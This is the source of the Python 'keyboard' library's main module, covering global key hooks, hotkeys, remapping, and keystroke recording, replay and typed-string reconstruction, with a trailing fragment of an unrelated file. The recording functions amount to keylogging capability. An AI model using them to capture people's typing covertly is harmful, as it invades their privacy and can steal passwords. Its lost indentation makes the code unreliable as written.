- Key suppression/blocking only available on Windows. [#22](https://github.com/boppreh/keyboard/issues/22)
- To avoid depending on X, the Linux backend reads raw device files (`/dev/input/input*`),
but this requires root.
- Other applications, such as some games, may register hooks that swallow all
key events. In this case `keyboard` will be unable to report events.
- This program makes no attempt to hide itself, so don't use it for keyloggers or online gaming bots. Be responsible.
"""
from __future__ import print_function as _print_function
import re as _re
import itertools as _itertools
import collections as _collections
from threading import Thread as _Thread, Lock as _Lock
import time as _time
# Python2... Buggy on time changes and leap seconds, but no other good option (https://stackoverflow.com/questions/1205722/how-do-i-get-monotonic-time-durations-in-python).
_time.monotonic = getattr(_time, 'monotonic', None) or _time.time
try:
# Python2
long, basestring
_is_str = lambda x: isinstance(x, basestring)
_is_number = lambda x: isinstance(x, (int, long))
import Queue as _queue
    # threading.Event is a function in Python2 wrapping _Event (?!).
from threading import _Event as _UninterruptibleEvent
except NameError:
# Python3
_is_str = lambda x: isinstance(x, str)
_is_number = lambda x: isinstance(x, int)
import queue as _queue
from threading import Event as _UninterruptibleEvent
_is_list = lambda x: isinstance(x, (list, tuple))
# Just a dynamic object to store attributes for the closures.
class _State(object): pass
# The "Event" class from `threading` ignores signals when waiting and is
# impossible to interrupt with Ctrl+C. So we rewrite `wait` to wait in small,
# interruptible intervals.
class _Event(_UninterruptibleEvent):
def wait(self):
while True:
if _UninterruptibleEvent.wait(self, 0.5):
break
import platform as _platform
if _platform.system() == 'Windows':
from. import _winkeyboard as _os_keyboard
elif _platform.system() == 'Linux':
from. import _nixkeyboard as _os_keyboard
elif _platform.system() == 'Darwin':
from. import _darwinkeyboard as _os_keyboard
else:
raise OSError("Unsupported platform '{}'".format(_platform.system()))
from ._keyboard_event import KEY_DOWN, KEY_UP, KeyboardEvent, normalize_name as _normalize_name
from ._generic import GenericListener as _GenericListener
from ._canonical_names import all_modifiers, sided_modifiers
_modifier_scan_codes = set()
def is_modifier(key):
"""
Returns True if `key` is a scan code or name of a modifier key.
"""
if _is_str(key):
return key in all_modifiers
else:
if not _modifier_scan_codes:
scan_codes = (key_to_scan_codes(name, False) for name in all_modifiers)
_modifier_scan_codes.update(*scan_codes)
return key in _modifier_scan_codes
_pressed_events_lock = _Lock()
_pressed_events = {}
_physically_pressed_keys = _pressed_events
_logically_pressed_keys = {}
class _KeyboardListener(_GenericListener):
transition_table = {
#Current state of the modifier, per `modifier_states`.
#|
#| Type of event that triggered this modifier update.
#| |
        #| | Type of key that triggered this modifier update.
#| | |
#| | | Should we send a fake key press?
#| | | |
#| | | => | Accept the event?
#| | | | |
#| | | | | Next state.
#v v v v v v
('free', KEY_UP, 'modifier'): (False, True, 'free'),
('free', KEY_DOWN, 'modifier'): (False, False, 'pending'),
('pending', KEY_UP, 'modifier'): (True, True, 'free'),
('pending', KEY_DOWN, 'modifier'): (False, True, 'allowed'),
('suppressed', KEY_UP, 'modifier'): (False, False, 'free'),
('suppressed', KEY_DOWN, 'modifier'): (False, False, 'suppressed'),
('allowed', KEY_UP, 'modifier'): (False, True, 'free'),
('allowed', KEY_DOWN, 'modifier'): (False, True, 'allowed'),
('free', KEY_UP, 'hotkey'): (False, None, 'free'),
('free', KEY_DOWN, 'hotkey'): (False, None, 'free'),
('pending', KEY_UP, 'hotkey'): (False, None, 'suppressed'),
('pending', KEY_DOWN, 'hotkey'): (False, None, 'suppressed'),
('suppressed', KEY_UP, 'hotkey'): (False, None, 'suppressed'),
('suppressed', KEY_DOWN, 'hotkey'): (False, None, 'suppressed'),
('allowed', KEY_UP, 'hotkey'): (False, None, 'allowed'),
('allowed', KEY_DOWN, 'hotkey'): (False, None, 'allowed'),
('free', KEY_UP, 'other'): (False, True, 'free'),
('free', KEY_DOWN, 'other'): (False, True, 'free'),
('pending', KEY_UP, 'other'): (True, True, 'allowed'),
('pending', KEY_DOWN, 'other'): (True, True, 'allowed'),
        # Necessary when hotkeys are removed after being triggered, such as
# TestKeyboard.test_add_hotkey_multistep_suppress_modifier.
('suppressed', KEY_UP, 'other'): (False, False, 'allowed'),
('suppressed', KEY_DOWN, 'other'): (True, True, 'allowed'),
('allowed', KEY_UP, 'other'): (False, True, 'allowed'),
('allowed', KEY_DOWN, 'other'): (False, True, 'allowed'),
}
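# Editor's note -- how to read one entry (a sketch using values from the
# table above): a lone modifier tap is suppressed on KEY_DOWN ('free' ->
# 'pending'); if it is released before any other key, the press is replayed:
#   transition_table[('pending', KEY_UP, 'modifier')] == (True, True, 'free')
#   # -> send a fake press, accept the release event, return to 'free'.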
def init(self):
_os_keyboard.init()
self.active_modifiers = set()
self.blocking_hooks = []
self.blocking_keys = _collections.defaultdict(list)
self.nonblocking_keys = _collections.defaultdict(list)
self.blocking_hotkeys = _collections.defaultdict(list)
self.nonblocking_hotkeys = _collections.defaultdict(list)
self.filtered_modifiers = _collections.Counter()
self.is_replaying = False
# Supporting hotkey suppression is harder than it looks. See
# https://github.com/boppreh/keyboard/issues/22
self.modifier_states = {} # "alt" -> "allowed"
def pre_process_event(self, event):
for key_hook in self.nonblocking_keys[event.scan_code]:
key_hook(event)
with _pressed_events_lock:
hotkey = tuple(sorted(_pressed_events))
for callback in self.nonblocking_hotkeys[hotkey]:
callback(event)
return event.scan_code or (event.name and event.name != 'unknown')
def direct_callback(self, event):
"""
This function is called for every OS keyboard event and decides if the
event should be blocked or not, and passes a copy of the event to
other, non-blocking, listeners.
There are two ways to block events: remapped keys, which translate
events by suppressing and re-emitting; and blocked hotkeys, which
suppress specific hotkeys.
"""
# Pass through all fake key events, don't even report to other handlers.
if self.is_replaying:
return True
if not all(hook(event) for hook in self.blocking_hooks):
return False
event_type = event.event_type
scan_code = event.scan_code
# Update tables of currently pressed keys and modifiers.
with _pressed_events_lock:
if event_type == KEY_DOWN:
if is_modifier(scan_code): self.active_modifiers.add(scan_code)
_pressed_events[scan_code] = event
hotkey = tuple(sorted(_pressed_events))
if event_type == KEY_UP:
self.active_modifiers.discard(scan_code)
if scan_code in _pressed_events: del _pressed_events[scan_code]
# Mappings based on individual keys instead of hotkeys.
for key_hook in self.blocking_keys[scan_code]:
if not key_hook(event):
return False
# Default accept.
accept = True
if self.blocking_hotkeys:
if self.filtered_modifiers[scan_code]:
origin = 'modifier'
modifiers_to_update = set([scan_code])
else:
modifiers_to_update = self.active_modifiers
if is_modifier(scan_code):
modifiers_to_update = modifiers_to_update | {scan_code}
callback_results = [callback(event) for callback in self.blocking_hotkeys[hotkey]]
if callback_results:
accept = all(callback_results)
origin = 'hotkey'
else:
origin = 'other'
for key in sorted(modifiers_to_update):
transition_tuple = (self.modifier_states.get(key, 'free'), event_type, origin)
should_press, new_accept, new_state = self.transition_table[transition_tuple]
if should_press: press(key)
if new_accept is not None: accept = new_accept
self.modifier_states[key] = new_state
if accept:
if event_type == KEY_DOWN:
_logically_pressed_keys[scan_code] = event
elif event_type == KEY_UP and scan_code in _logically_pressed_keys:
del _logically_pressed_keys[scan_code]
# Queue for handlers that won't block the event.
self.queue.put(event)
return accept
def listen(self):
_os_keyboard.listen(self.direct_callback)
_listener = _KeyboardListener()
def key_to_scan_codes(key, error_if_missing=True):
"""
Returns a list of scan codes associated with this key (name or scan code).
"""
if _is_number(key):
return (key,)
elif _is_list(key):
return sum((key_to_scan_codes(i) for i in key), ())
elif not _is_str(key):
raise ValueError('Unexpected key type ' + str(type(key)) + ', value (' + repr(key) + ')')
normalized = _normalize_name(key)
if normalized in sided_modifiers:
left_scan_codes = key_to_scan_codes('left ' + normalized, False)
right_scan_codes = key_to_scan_codes('right ' + normalized, False)
return left_scan_codes + tuple(c for c in right_scan_codes if c not in left_scan_codes)
try:
# Put items in ordered dict to remove duplicates.
t = tuple(_collections.OrderedDict((scan_code, True) for scan_code, modifier in _os_keyboard.map_name(normalized)))
e = None
except (KeyError, ValueError) as exception:
t = ()
e = exception
if not t and error_if_missing:
raise ValueError('Key {} is not mapped to any known key.'.format(repr(key)), e)
else:
return t
def parse_hotkey(hotkey):
"""
Parses a user-provided hotkey into nested tuples representing the
parsed structure, with the bottom values being lists of scan codes.
Also accepts raw scan codes, which are then wrapped in the required
number of nestings.
Example:
parse_hotkey("alt+shift+a, alt+b, c")
# Keys: ^~^ ^~~~^ ^ ^~^ ^ ^
# Steps: ^~~~~~~~~~^ ^~~~^ ^
# ((alt_codes, shift_codes, a_codes), (alt_codes, b_codes), (c_codes,))
"""
if _is_number(hotkey) or len(hotkey) == 1:
scan_codes = key_to_scan_codes(hotkey)
step = (scan_codes,)
steps = (step,)
return steps
elif _is_list(hotkey):
if not any(map(_is_list, hotkey)):
step = tuple(key_to_scan_codes(k) for k in hotkey)
steps = (step,)
return steps
return hotkey
steps = []
for step in _re.split(r',\s?', hotkey):
keys = _re.split(r'\s?\+\s?', step)
steps.append(tuple(key_to_scan_codes(key) for key in keys))
return tuple(steps)
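# Editor's note -- a sketch of the wrapping behaviour for raw scan codes
# (57 is the usual scan code for space; illustrative only):
#   parse_hotkey(57)  # -> (((57,),),)  one step, one key, one scan code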
def send(hotkey, do_press=True, do_release=True):
"""
Sends OS events that perform the given hotkey.
- `hotkey` can be either a scan code (e.g. 57 for space), single key
(e.g. 'space') or multi-key, multi-step hotkey (e.g. 'alt+F4, enter').
- `do_press` if true then press events are sent. Defaults to True.
- `do_release` if true then release events are sent. Defaults to True.
send(57)
send('ctrl+alt+del')
send('alt+F4, enter')
send('shift+s')
Note: keys are released in the opposite order they were pressed.
"""
_listener.is_replaying = True
parsed = parse_hotkey(hotkey)
for step in parsed:
if do_press:
for scan_codes in step:
_os_keyboard.press(scan_codes[0])
if do_release:
for scan_codes in reversed(step):
_os_keyboard.release(scan_codes[0])
_listener.is_replaying = False
# Alias.
press_and_release = send
def press(hotkey):
""" Presses and holds down a hotkey (see `send`). """
send(hotkey, True, False)
def release(hotkey):
""" Releases a hotkey (see `send`). """
send(hotkey, False, True)
def is_pressed(hotkey):
"""
Returns True if the key is pressed.
is_pressed(57) #-> True
is_pressed('space') #-> True
is_pressed('ctrl+space') #-> True
"""
_listener.start_if_necessary()
if _is_number(hotkey):
# Shortcut.
with _pressed_events_lock:
return hotkey in _pressed_events
steps = parse_hotkey(hotkey)
if len(steps) > 1:
raise ValueError("Impossible to check if multi-step hotkeys are pressed (`a+b` is ok, `a, b` isn't).")
# Convert _pressed_events into a set
with _pressed_events_lock:
pressed_scan_codes = set(_pressed_events)
for scan_codes in steps[0]:
if not any(scan_code in pressed_scan_codes for scan_code in scan_codes):
return False
return True
def call_later(fn, args=(), delay=0.001):
"""
Calls the provided function in a new thread after waiting some time.
Useful for giving the system some time to process an event, without blocking
the current execution flow.
"""
thread = _Thread(target=lambda: (_time.sleep(delay), fn(*args)))
thread.start()
_hooks = {}
def hook(callback, suppress=False, on_remove=lambda: None):
"""
Installs a global listener on all available keyboards, invoking `callback`
each time a key is pressed or released.
The event passed to the callback is of type `keyboard.KeyboardEvent`,
with the following attributes:
- `name`: a Unicode representation of the character (e.g. "&") or
description (e.g. "space"). The name is always lower-case.
- `scan_code`: number representing the physical key, e.g. 55.
- `time`: timestamp of the time the event occurred, with as much precision
as given by the OS.
Returns the given callback for easier development.
"""
if suppress:
_listener.start_if_necessary()
append, remove = _listener.blocking_hooks.append, _listener.blocking_hooks.remove
else:
append, remove = _listener.add_handler, _listener.remove_handler
append(callback)
def remove_():
del _hooks[callback]
del _hooks[remove_]
remove(callback)
on_remove()
_hooks[callback] = _hooks[remove_] = remove_
return remove_
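# Editor's note -- a minimal usage sketch for `hook` (assumes a running
# listener; not executed here):
#   remove = hook(lambda e: print(e.name, e.event_type))
#   ...
#   remove()  # or equivalently unhook(remove)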
def on_press(callback, suppress=False):
"""
Invokes `callback` for every KEY_DOWN event. For details see `hook`.
"""
return hook(lambda e: e.event_type == KEY_UP or callback(e), suppress=suppress)
def on_release(callback, suppress=False):
"""
Invokes `callback` for every KEY_UP event. For details see `hook`.
"""
return hook(lambda e: e.event_type == KEY_DOWN or callback(e), suppress=suppress)
def hook_key(key, callback, suppress=False):
"""
Hooks key up and key down events for a single key. Returns the event handler
created. To remove a hooked key use `unhook_key(key)` or
`unhook_key(handler)`.
Note: this function shares state with hotkeys, so `clear_all_hotkeys`
affects it as well.
"""
_listener.start_if_necessary()
store = _listener.blocking_keys if suppress else _listener.nonblocking_keys
scan_codes = key_to_scan_codes(key)
for scan_code in scan_codes:
store[scan_code].append(callback)
def remove_():
del _hooks[callback]
del _hooks[key]
del _hooks[remove_]
for scan_code in scan_codes:
store[scan_code].remove(callback)
_hooks[callback] = _hooks[key] = _hooks[remove_] = remove_
return remove_
def on_press_key(key, callback, suppress=False):
"""
Invokes `callback` for KEY_DOWN event related to the given key. For details see `hook`.
"""
return hook_key(key, lambda e: e.event_type == KEY_UP or callback(e), suppress=suppress)
def on_release_key(key, callback, suppress=False):
"""
Invokes `callback` for KEY_UP event related to the given key. For details see `hook`.
"""
return hook_key(key, lambda e: e.event_type == KEY_DOWN or callback(e), suppress=suppress)
def unhook(remove):
"""
Removes a previously added hook, either by callback or by the return value
of `hook`.
"""
_hooks[remove]()
unhook_key = unhook
def unhook_all():
"""
Removes all keyboard hooks in use, including hotkeys, abbreviations, word
listeners, `record`ers and `wait`s.
"""
_listener.start_if_necessary()
_listener.blocking_keys.clear()
_listener.nonblocking_keys.clear()
del _listener.blocking_hooks[:]
del _listener.handlers[:]
unhook_all_hotkeys()
def block_key(key):
"""
Suppresses all key events of the given key, regardless of modifiers.
"""
return hook_key(key, lambda e: False, suppress=True)
unblock_key = unhook_key
def remap_key(src, dst):
"""
Whenever the key `src` is pressed or released, regardless of modifiers,
press or release the hotkey `dst` instead.
"""
def handler(event):
if event.event_type == KEY_DOWN:
press(dst)
else:
release(dst)
return False
return hook_key(src, handler, suppress=True)
unremap_key = unhook_key
def parse_hotkey_combinations(hotkey):
"""
Parses a user-provided hotkey. Differently from `parse_hotkey`,
instead of each step being a list of the different scan codes for each key,
each step is a list of all possible combinations of those scan codes.
"""
def combine_step(step):
# A single step may be composed of many keys, and each key can have
# multiple scan codes. To speed up hotkey matching and avoid introducing
# event delays, we list all possible combinations of scan codes for these
# keys. Hotkeys are usually small, and there are not many combinations, so
# this is not as insane as it sounds.
return (tuple(sorted(scan_codes)) for scan_codes in _itertools.product(*step))
return tuple(tuple(combine_step(step)) for step in parse_hotkey(hotkey))
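# Editor's note -- an illustrative expansion (scan codes assumed): if 'shift'
# maps to (42, 54) and 'a' maps to (30,), the single step 'shift+a' expands
# to the combinations ((30, 42), (30, 54)), i.e. one sorted tuple per element
# of the cartesian product of the keys' scan codes.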
def _add_hotkey_step(handler, combinations, suppress):
"""
Hooks a single-step hotkey (e.g. 'shift+a').
"""
container = _listener.blocking_hotkeys if suppress else _listener.nonblocking_hotkeys
# Register the scan codes of every possible combination of
# modifier + main key. Modifiers have to be registered in
# filtered_modifiers too, so suppression and replaying can work.
for scan_codes in combinations:
for scan_code in scan_codes:
if is_modifier(scan_code):
_listener.filtered_modifiers[scan_code] += 1
container[scan_codes].append(handler)
def remove():
for scan_codes in combinations:
for scan_code in scan_codes:
if is_modifier(scan_code):
_listener.filtered_modifiers[scan_code] -= 1
container[scan_codes].remove(handler)
return remove
_hotkeys = {}
def add_hotkey(hotkey, callback, args=(), suppress=False, timeout=1, trigger_on_release=False):
"""
Invokes a callback every time a hotkey is pressed. The hotkey must
be in the format `ctrl+shift+a, s`. This would trigger when the user holds
ctrl, shift and "a" at once, releases, and then presses "s". To represent
literal commas, pluses, and spaces, use their names ('comma', 'plus',
'space').
- `args` is an optional list of arguments to be passed to the callback during
each invocation.
- `suppress` defines if successful triggers should block the keys from being
sent to other programs.
- `timeout` is the amount of seconds allowed to pass between key presses
before the hotkey state is reset.
- `trigger_on_release` if true, the callback is invoked on key release instead
of key press.
The event handler function is returned. To remove a hotkey call
`remove_hotkey(hotkey)` or `remove_hotkey(handler)`.
Note: hotkeys are activated when the last key is *pressed*, not released.
Note: the callback is executed in a separate thread, asynchronously. For an
example of how to use a callback synchronously, see `wait`.
Examples:
# Different but equivalent ways to listen for a spacebar key press.
add_hotkey(' ', print, args=['space was pressed'])
add_hotkey('space', print, args=['space was pressed'])
add_hotkey('Space', print, args=['space was pressed'])
# Here 57 represents the keyboard code for spacebar; so you will be
# pressing 'spacebar', not '57' to activate the print function.
add_hotkey(57, print, args=['space was pressed'])
add_hotkey('ctrl+q', quit)
add_hotkey('ctrl+alt+enter, space', some_callback)
"""
if args:
callback = lambda callback=callback: callback(*args)
_listener.start_if_necessary()
steps = parse_hotkey_combinations(hotkey)
event_type = KEY_UP if trigger_on_release else KEY_DOWN
if len(steps) == 1:
# Deciding when to allow a KEY_UP event is far harder than I thought,
# and any mistake will make that key "sticky". Therefore just let all
# KEY_UP events go through as long as that's not what we are listening
# for.
handler = lambda e: (event_type == KEY_DOWN and e.event_type == KEY_UP and e.scan_code in _logically_pressed_keys) or (event_type == e.event_type and callback())
remove_step = _add_hotkey_step(handler, steps[0], suppress)
def remove_():
remove_step()
del _hotkeys[hotkey]
del _hotkeys[remove_]
del _hotkeys[callback]
# TODO: allow multiple callbacks for each hotkey without overwriting the
# remover.
_hotkeys[hotkey] = _hotkeys[remove_] = _hotkeys[callback] = remove_
return remove_
state = _State()
state.remove_catch_misses = None
state.remove_last_step = None
state.suppressed_events = []
state.last_update = float('-inf')
def catch_misses(event, force_fail=False):
if (
event.event_type == event_type
and state.index
and event.scan_code not in allowed_keys_by_step[state.index]
) or (
timeout
and _time.monotonic() - state.last_update >= timeout
) or force_fail: # Weird formatting to ensure short-circuit.
state.remove_last_step()
for event in state.suppressed_events:
if event.event_type == KEY_DOWN:
press(event.scan_code)
else:
release(event.scan_code)
del state.suppressed_events[:]
index = 0
set_index(0)
return True
def set_index(new_index):
state.index = new_index
if new_index == 0:
# This is done for performance reasons, avoiding a global key hook
# that is always on.
state.remove_catch_misses = lambda: None
elif new_index == 1:
state.remove_catch_misses()
# Must be `suppress=True` to ensure `send` has priority.
state.remove_catch_misses = hook(catch_misses, suppress=True)
if new_index == len(steps) - 1:
def handler(event):
if event.event_type == KEY_UP:
remove()
set_index(0)
accept = event.event_type == event_type and callback()
if accept:
return catch_misses(event, force_fail=True)
else:
state.suppressed_events[:] = [event]
return False
remove = _add_hotkey_step(handler, steps[state.index], suppress)
else:
# Fix value of next_index.
def handler(event, new_index=state.index+1):
if event.event_type == KEY_UP:
remove()
set_index(new_index)
state.suppressed_events.append(event)
return False
remove = _add_hotkey_step(handler, steps[state.index], suppress)
state.remove_last_step = remove
state.last_update = _time.monotonic()
return False
set_index(0)
allowed_keys_by_step = [
set().union(*step)
for step in steps
]
def remove_():
state.remove_catch_misses()
state.remove_last_step()
del _hotkeys[hotkey]
del _hotkeys[remove_]
del _hotkeys[callback]
# TODO: allow multiple callbacks for each hotkey without overwriting the
# remover.
_hotkeys[hotkey] = _hotkeys[remove_] = _hotkeys[callback] = remove_
return remove_
register_hotkey = add_hotkey
def remove_hotkey(hotkey_or_callback):
"""
Removes a previously hooked hotkey. Must be called with the value returned
by `add_hotkey`.
"""
_hotkeys[hotkey_or_callback]()
unregister_hotkey = clear_hotkey = remove_hotkey
def unhook_all_hotkeys():
"""
Removes all keyboard hotkeys in use, including abbreviations, word listeners,
`record`ers and `wait`s.
"""
# Because of "alises" some hooks may have more than one entry, all of which
# are removed together.
_listener.blocking_hotkeys.clear()
_listener.nonblocking_hotkeys.clear()
unregister_all_hotkeys = remove_all_hotkeys = clear_all_hotkeys = unhook_all_hotkeys
def remap_hotkey(src, dst, suppress=True, trigger_on_release=False):
"""
Whenever the hotkey `src` is pressed, suppress it and send
`dst` instead.
Example:
remap('alt+w', 'ctrl+up')
"""
def handler():
active_modifiers = sorted(modifier for modifier, state in _listener.modifier_states.items() if state == 'allowed')
for modifier in active_modifiers:
release(modifier)
send(dst)
for modifier in reversed(active_modifiers):
press(modifier)
return False
return add_hotkey(src, handler, suppress=suppress, trigger_on_release=trigger_on_release)
unremap_hotkey = remove_hotkey
def stash_state():
"""
Builds a list of all currently pressed scan codes, releases them and returns
the list. Pairs well with `restore_state` and `restore_modifiers`.
"""
# TODO: stash caps lock / num lock / scroll lock state.
with _pressed_events_lock:
state = sorted(_pressed_events)
for scan_code in state:
_os_keyboard.release(scan_code)
return state
def restore_state(scan_codes):
"""
Given a list of scan_codes ensures these keys, and only these keys, are
pressed. Pairs well with `stash_state`, alternative to `restore_modifiers`.
"""
_listener.is_replaying = True
with _pressed_events_lock:
current = set(_pressed_events)
target = set(scan_codes)
for scan_code in current - target:
_os_keyboard.release(scan_code)
for scan_code in target - current:
_os_keyboard.press(scan_code)
_listener.is_replaying = False
def restore_modifiers(scan_codes):
"""
Like `restore_state`, but only restores modifier keys.
"""
restore_state((scan_code for scan_code in scan_codes if is_modifier(scan_code)))
def write(text, delay=0, restore_state_after=True, exact=None):
"""
Sends artificial keyboard events to the OS, simulating the typing of a given
text. Characters not available on the keyboard are typed as explicit unicode
characters using OS-specific functionality, such as alt+codepoint.
To ensure text integrity, all currently pressed keys are released before
the text is typed, and modifiers are restored afterwards.
- `delay` is the number of seconds to wait between keypresses, defaults to
no delay.
- `restore_state_after` can be used to restore the state of pressed keys
after the text is typed, i.e. presses the keys that were released at the
beginning. Defaults to True.
- `exact` forces typing all characters as explicit unicode (e.g.
alt+codepoint or special events). If None, uses platform-specific suggested
value.
"""
if exact is None:
exact = _platform.system() == 'Windows'
state = stash_state()
# Windows' typing of unicode characters is quite efficient and should be preferred.
if exact:
for letter in text:
if letter in '\n\b':
send(letter)
else:
_os_keyboard.type_unicode(letter)
if delay: _time.sleep(delay)
else:
for letter in text:
try:
entries = _os_keyboard.map_name(_normalize_name(letter))
scan_code, modifiers = next(iter(entries))
except (KeyError, ValueError):
_os_keyboard.type_unicode(letter)
continue
for modifier in modifiers:
press(modifier)
_os_keyboard.press(scan_code)
_os_keyboard.release(scan_code)
for modifier in modifiers:
release(modifier)
if delay:
_time.sleep(delay)
if restore_state_after:
restore_modifiers(state)
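# Editor's note -- a usage sketch for `write` (not executed here):
#   write('Hello', delay=0.05)  # types "Hello" with 50 ms between keypresses
#   write(u'naïve', exact=True) # forces explicit unicode typing (the default
#                               # on Windows, per the docstring above)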
def wait(hotkey=None, suppress=False, trigger_on_release=False):
"""
Blocks the program execution until the given hotkey is pressed or,
if given no parameters, blocks forever.
"""
if hotkey:
lock = _Event()
remove = add_hotkey(hotkey, lambda: lock.set(), suppress=suppress, trigger_on_release=trigger_on_release)
lock.wait()
remove_hotkey(remove)
else:
while True:
_time.sleep(1e6)
def get_hotkey_name(names=None):
"""
Returns a string representation of hotkey from the given key names, or
the currently pressed keys if not given. This function:
- normalizes names;
- removes "left" and "right" prefixes;
- replaces the "+" key name with "plus" to avoid ambiguity;
- puts modifier keys first, in a standardized order;
- sorts remaining keys;
- finally, joins everything with "+".
Example:
get_hotkey_name(['+', 'left ctrl', 'shift'])
# "ctrl+shift+plus"
"""
if names is None:
_listener.start_if_necessary()
with _pressed_events_lock:
names = [e.name for e in _pressed_events.values()]
else:
names = [_normalize_name(name) for name in names]
clean_names = set(e.replace('left ', '').replace('right ', '').replace('+', 'plus') for e in names)
# https://developer.apple.com/macos/human-interface-guidelines/input-and-output/keyboard/
# > List modifier keys in the correct order. If you use more than one modifier key in a
# > hotkey, always list them in this order: Control, Option, Shift, Command.
modifiers = ['ctrl', 'alt', 'shift', 'windows']
sorting_key = lambda k: (modifiers.index(k) if k in modifiers else 5, str(k))
return '+'.join(sorted(clean_names, key=sorting_key))
def read_event(suppress=False):
"""
Blocks until a keyboard event happens, then returns that event.
"""
queue = _queue.Queue(maxsize=1)
hooked = hook(queue.put, suppress=suppress)
while True:
event = queue.get()
unhook(hooked)
return event
def read_key(suppress=False):
"""
Blocks until a keyboard event happens, then returns that event's name or,
if missing, its scan code.
"""
event = read_event(suppress)
return event.name or event.scan_code
def read_hotkey(suppress=True):
"""
Similar to `read_key()`, but blocks until the user presses and releases a
hotkey (or single key), then returns a string representing the hotkey
pressed.
Example:
read_hotkey()
# "ctrl+shift+p"
"""
queue = _queue.Queue()
fn = lambda e: queue.put(e) or e.event_type == KEY_DOWN
hooked = hook(fn, suppress=suppress)
while True:
event = queue.get()
if event.event_type == KEY_UP:
unhook(hooked)
with _pressed_events_lock:
names = [e.name for e in _pressed_events.values()] + [event.name]
return get_hotkey_name(names)
def get_typed_strings(events, allow_backspace=True):
"""
Given a sequence of events, tries to deduce what strings were typed.
Strings are separated when a non-textual key is pressed (such as tab or
enter). Characters are converted to uppercase according to shift and
capslock status. If `allow_backspace` is True, backspaces remove the last
character typed.
This function is a generator, so you can pass an infinite stream of events
and convert them to strings in real time.
Note this function is merely a heuristic. Windows, for example, keeps per-
process keyboard state such as keyboard layout, and this information is not
available for our hooks.
get_typed_strings(record()) #-> ['This is what', 'I recorded', '']
"""
backspace_name = 'delete' if _platform.system() == 'Darwin' else 'backspace'
shift_pressed = False
capslock_pressed = False
string = ''
for event in events:
name = event.name
# Space is the only key whose name we spell out ('space' instead of ' ')
# for legibility. Now we have to undo that.
if event.name == 'space':
name = ' '
if 'shift' in event.name:
shift_pressed = event.event_type == 'down'
elif event.name == 'caps lock' and event.event_type == 'down':
capslock_pressed = not capslock_pressed
elif allow_backspace and event.name == backspace_name and event.event_type == 'down':
string = string[:-1]
elif event.event_type == 'down':
if len(name) == 1:
if shift_pressed ^ capslock_pressed:
name = name.upper()
string = string + name
else:
yield string
string = ''
yield string
_recording = None
def start_recording(recorded_events_queue=None):
"""
Starts recording all keyboard events into a global variable, or the given
queue if any. Returns the queue of events and the hooked function.
Use `stop_recording()` or `unhook(hooked_function)` to stop.
"""
recorded_events_queue = recorded_events_queue or _queue.Queue()
global _recording
_recording = (recorded_events_queue, hook(recorded_events_queue.put))
return _recording
def stop_recording():
"""
Stops the global recording of events and returns a list of the events
captured.
"""
global _recording
if not _recording:
raise ValueError('Must call "start_recording" before.')
recorded_events_queue, hooked = _recording
unhook(hooked)
return list(recorded_events_queue.queue)
def record(until='escape', suppress=False, trigger_on_release=False):
"""
Records all keyboard events from all keyboards until the user presses the
given hotkey. Then returns the list of events recorded, of type
`keyboard.KeyboardEvent`. Pairs well with
`play(events)`.
Note: this is a blocking function.
Note: for more details on the keyboard hook and events see `hook`.
"""
start_recording()
wait(until, suppress=suppress, trigger_on_release=trigger_on_release)
return stop_recording()
def play(events, speed_factor=1.0):
"""
Plays a sequence of recorded events, maintaining the relative time
intervals. If speed_factor is <= 0 then the actions are replayed as fast
as the OS allows. Pairs well with `record()`.
Note: the current keyboard state is cleared at the beginning and restored at
the end of the function.
"""
state = stash_state()
last_time = None
for event in events:
if speed_factor > 0 and last_time is not None:
_time.sleep((event.time - last_time) / speed_factor)
last_time = event.time
key = event.scan_code or event.name
press(key) if event.event_type == KEY_DOWN else release(key)
restore_modifiers(state)
replay = play
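# Editor's note -- record/play pair well together; a sketch (blocks until
# escape is pressed, then replays everything at double speed):
#   events = record(until='escape')
#   play(events, speed_factor=2.0)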
_word_listeners = {}
def add_word_listener(word, callback, triggers=['space'], match_suffix=False, timeout=2):
"""
Invokes a callback every time a sequence of characters is typed (e.g. 'pet')
and followed by a trigger key (e.g. space). Modifiers (e.g. alt, ctrl,
shift) are ignored.
- `word` the typed text to be matched. E.g. 'pet'.
- `callback` is an argument-less function to be invoked each time the word
is typed.
- `triggers` is the list of keys that will cause a match to be checked. If
the user presses some key that is not a character (len>1) and not in
triggers, the characters so far will be discarded. By default the trigger
is only `space`.
- `match_suffix` defines if endings of words should also be checked instead
of only whole words. E.g. if true, typing 'carpet'+space will trigger the
listener for 'pet'. Defaults to false, only whole words are checked.
- `timeout` is the maximum number of seconds between typed characters before
the current word is discarded. Defaults to 2 seconds.
Returns the event handler created. To remove a word listener use
`remove_word_listener(word)` or `remove_word_listener(handler)`.
Note: all actions are performed on key down. Key up events are ignored.
Note: word matches are **case sensitive**.
"""
state = _State()
state.current = ''
state.time = -1
def handler(event):
name = event.name
if event.event_type == KEY_UP or name in all_modifiers: return
if timeout and event.time - state.time > timeout:
state.current = ''
state.time = event.time
matched = state.current == word or (match_suffix and state.current.endswith(word))
if name in triggers and matched:
callback()
state.current = ''
elif len(name) > 1:
state.current = ''
else:
state.current += name
hooked = hook(handler)
def remove():
hooked()
del _word_listeners[word]
del _word_listeners[handler]
del _word_listeners[remove]
_word_listeners[word] = _word_listeners[handler] = _word_listeners[remove] = remove
# TODO: allow multiple word listeners and removing them correctly.
return remove
def remove_word_listener(word_or_handler):
"""
Removes a previously registered word listener. Accepts either the word used
during registration (exact string) or the event handler returned by the
`add_word_listener` or `add_abbreviation` functions.
"""
_word_listeners[word_or_handler]()
def add_abbreviation(source_text, replacement_text, match_suffix=False, timeout=2):
"""
Registers a hotkey that replaces one typed text with another. For example
add_abbreviation('tm', u'™')
Replaces every "tm" followed by a space with a ™ symbol (and no space). The
replacement is done by sending backspace events.
- `match_suffix` defines if endings of words should also be checked instead
of only whole words. E.g. if true, typing 'carpet'+space will trigger the
listener for 'pet'. Defaults to false, only whole words are checked.
- `timeout` is the maximum number of seconds between typed characters before
the current word is discarded. Defaults to 2 seconds.
For more details see `add_word_listener`.
"""
replacement = '\b'*(len(source_text)+1) + replacement_text
callback = lambda: write(replacement)
return add_word_listener(source_text, callback, match_suffix=match_suffix, timeout=timeout)
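# Editor's note -- the replacement string built above, illustrated for
# add_abbreviation('tm', u'™'): three backspaces (erasing 't', 'm' and the
# trigger space) followed by the replacement, i.e. '\b\b\b™'.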
# Aliases.
register_word_listener = add_word_listener
register_abbreviation = add_abbreviation
remove_abbreviation = remove_word_listener
|
mp.py
|
import logging
import multiprocessing
import select
import unittest
import collections
import collections.abc
import os
import sys
import six
import multiprocessing.connection as connection
